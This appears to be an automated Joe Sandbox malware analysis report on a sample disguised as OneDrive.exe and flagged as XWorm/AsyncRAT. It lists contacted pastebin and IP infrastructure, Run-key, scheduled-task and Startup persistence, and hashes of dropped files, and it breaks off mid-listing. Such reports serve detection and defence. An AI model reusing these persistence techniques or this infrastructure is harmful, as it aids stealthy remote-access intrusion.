              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
              https://.VisualC0%Avira URL Cloudsafe
              http://www.microsoft.co0%Avira URL Cloudsafe
              https://pastebin.com0%Avira URL Cloudsafe
              http://crl.micft.cMicRosof0%Avira URL Cloudsafe
              https://pastebin.com/raw/RPPi3ByL0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://crl.micros0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pastebin.com
              		104.20.4.235
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://pastebin.com/raw/RPPi3ByLtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1412318309.00000167B9DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1501492317.000002C0637BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1650062025.00000187E0F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.mpowershell.exe, 00000002.00000002.1418402598.00000167C226C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1392868961.00000167A9FA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C05397A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D115A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A63935C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1392868961.00000167A9FA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C05397A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D115A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A63935C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000005.00000002.1518057875.000002C06BE40000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1412318309.00000167B9DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1501492317.000002C0637BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1650062025.00000187E0F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.microsoft.copowershell.exe, 0000000C.00000002.1908754087.000001A6515C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.micpowershell.exe, 00000005.00000002.1523227635.000002C06BF57000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://.VisualCpowershell.exe, 0000000C.00000002.1906915727.000001A651573000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.1523227635.000002C06BF57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1392868961.00000167A9D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C053751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D0F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A639021000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOneDrive.exe, 00000000.00000002.2587401909.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1392868961.00000167A9D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C053751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D0F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A639021000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://pastebin.comOneDrive.exe, 00000000.00000002.2587401909.0000000002F91000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.microspowershell.exe, 00000002.00000002.1418402598.00000167C226C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              213.219.149.161
              		unknownBelgium
              		9031EDPNETBEfalse
              104.20.4.235
              		pastebin.comUnited States
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1487313
              Start date and time:2024-08-03 20:10:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 15s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:24
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:OneDrive.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@20/21@1/2
              EGA Information:
              • Successful, ratio: 12.5%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 77
              • Number of non-executed functions: 4
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target OneDrive.exe, PID 3240 because it is empty
              • Execution Graph export aborted for target OneDrive.exe, PID 3252 because it is empty
              • Execution Graph export aborted for target OneDrive.exe, PID 4844 because it is empty
              • Execution Graph export aborted for target OneDrive.exe, PID 6060 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 4940 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 7656 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              14:11:07API Interceptor54x Sleep call for process: powershell.exe modified
              14:12:05API Interceptor36004x Sleep call for process: OneDrive.exe modified
              19:12:06Task SchedulerRun new task: OneDrive path: C:\ProgramData\OneDrive.exe
              19:12:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\ProgramData\OneDrive.exe
              19:12:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\ProgramData\OneDrive.exe
              19:12:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              213.219.149.161msedge.exeGet hashmaliciousXWormBrowse
                Chrome Update.exeGet hashmaliciousXWormBrowse
                  104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                  • pastebin.com/raw/V9y5Q5vv
                  New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                  • pastebin.com/raw/NsQ5qTHr
                  Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                  • pastebin.com/raw/NsQ5qTHr
                  Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                  • pastebin.com/raw/NsQ5qTHr
                  Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                  • pastebin.com/raw/NsQ5qTHr
                  Update on Payment.jsGet hashmaliciousWSHRATBrowse
                  • pastebin.com/raw/NsQ5qTHr

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  pastebin.commsedge.exeGet hashmaliciousXWormBrowse
                  • 104.20.3.235
                  Chrome Update.exeGet hashmaliciousXWormBrowse
                  • 104.20.3.235
                  SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                  • 104.20.3.235
                  setup.exeGet hashmaliciousXmrigBrowse
                  • 172.67.19.24
                  setup.exeGet hashmaliciousXWormBrowse
                  • 172.67.19.24
                  SolaraModified.exeGet hashmaliciousXWormBrowse
                  • 104.20.3.235
                  E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                  • 104.20.4.235
                  Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                  • 104.20.3.235
                  WcBQ1Er7ys.exeGet hashmaliciousDCRatBrowse
                  • 104.20.3.235
                  VhaWmJu2Sz.exeGet hashmaliciousDCRatBrowse
                  • 104.20.4.235

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSmsedge.exeGet hashmaliciousXWormBrowse
                  • 104.20.3.235
                  Chrome Update.exeGet hashmaliciousXWormBrowse
                  • 104.20.3.235
                  Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                  • 188.114.96.3
                  gdsowzgr.exeGet hashmaliciousPureLog StealerBrowse
                  • 104.26.11.250
                  2.htmlGet hashmaliciousPhisherBrowse
                  • 104.17.25.14
                  Agrial_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 104.18.3.35
                  new.batGet hashmaliciousUnknownBrowse
                  • 104.16.231.132
                  CNvMbuoe5h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 188.114.96.3
                  Payment ConfirmationSwift copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 104.21.59.93
                  SWIFT COPY.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                  • 188.114.96.3
                  EDPNETBEmsedge.exeGet hashmaliciousXWormBrowse
                  • 213.219.149.161
                  Chrome Update.exeGet hashmaliciousXWormBrowse
                  • 213.219.149.161
                  pyurUmcf1b.exeGet hashmaliciousUnknownBrowse
                  • 185.95.73.246
                  4DU7NWnERk.elfGet hashmaliciousMiraiBrowse
                  • 212.71.18.80
                  4pR4wy3RZI.elfGet hashmaliciousMirai, GafgytBrowse
                  • 94.105.109.149
                  x3xtJjU3P5.elfGet hashmaliciousMiraiBrowse
                  • 94.105.109.140
                  t3ttQtxRbr.elfGet hashmaliciousUnknownBrowse
                  • 213.219.178.219
                  mpsl.elfGet hashmaliciousMiraiBrowse
                  • 94.105.109.139
                  1GrhAc095b.elfGet hashmaliciousUnknownBrowse
                  • 79.132.226.219
                  YVKwT4UFIs.elfGet hashmaliciousMiraiBrowse
                  • 212.71.1.166

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0emsedge.exeGet hashmaliciousXWormBrowse
                  • 104.20.4.235
                  Chrome Update.exeGet hashmaliciousXWormBrowse
                  • 104.20.4.235
                  gdsowzgr.exeGet hashmaliciousPureLog StealerBrowse
                  • 104.20.4.235
                  SecuriteInfo.com.Adware.DownwareNET.4.32136.10916.exeGet hashmaliciousUnknownBrowse
                  • 104.20.4.235
                  https://ipfs.io/ipfs/QmVLJJWuJ1bT38BeLkxSKLDMhVADeV6vmCtQ5cAqW3qdoRGet hashmaliciousHTMLPhisherBrowse
                  • 104.20.4.235
                  https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                  • 104.20.4.235
                  http://pub-608d6ec484ce4b79bfcddf51573362c3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.20.4.235
                  https://metamsk-chron-page.webflow.io/Get hashmaliciousUnknownBrowse
                  • 104.20.4.235
                  https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                  • 104.20.4.235
                  http://mmetamaskl---logggin.webflow.io/Get hashmaliciousUnknownBrowse
                  • 104.20.4.235

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\OneDrive.exe

                  Download File
                  Process:C:\Users\user\Desktop\OneDrive.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):143360
                  Entropy (8bit):4.148450742999168
                  Encrypted:false
                  SSDEEP:768:q0ND+ctkzIlNMKdj3BAFWPa9k7Bm6POwhsriO6t621sIwEk4w00wI:q0Nqctg8NyFv9kVm6POw6mOXEU
                  MD5:A1CD6F4A3A37ED83515AA4752F98EB1D
                  SHA1:7F787C8D72787D8D130B4788B006B799167D1802
                  SHA-256:5CBCC0A0C1D74CD54AC999717B0FF0607FE6ED02CCA0A3E0433DD94783CFEC65
                  SHA-512:9489287E0B4925345FEE05FE2F6E6F12440AF1425EF397145E32E6F80C7AE98B530E42002D92DC156643F9829BC8A3B969E855CECD2265B6616C4514EED00355
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\OneDrive.exe, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\OneDrive.exe, Author: ditekSHen
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 76%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................N.... ........@.. ....................................@.....................................W............................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc.......`......................@..B................0.......H........Z...X............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

                  Download File
                  Process:C:\ProgramData\OneDrive.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):654
                  Entropy (8bit):5.380476433908377
                  Encrypted:false
                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                  Malicious:true
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................

                  C:\Users\user\AppData\Local\Temp\Log.tmp

                  Download File
                  Process:C:\Users\user\Desktop\OneDrive.exe
                  File Type:Generic INItialization configuration [WIN]
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):3.6722687970803873
                  Encrypted:false
                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                  MD5:DE63D53293EBACE29F3F54832D739D40
                  SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                  SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                  SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                  Malicious:false
                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_115nurjq.25p.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14wkqjiv.ku0.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1544vdbx.vnu.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3oroniok.zfi.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byoapfqy.ouq.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cr2ys1xr.aac.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqma35bc.0mq.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdaiqd2e.ffu.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hidwmcv5.3xd.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxu1yeri.s2k.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3tcrume.i3z.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
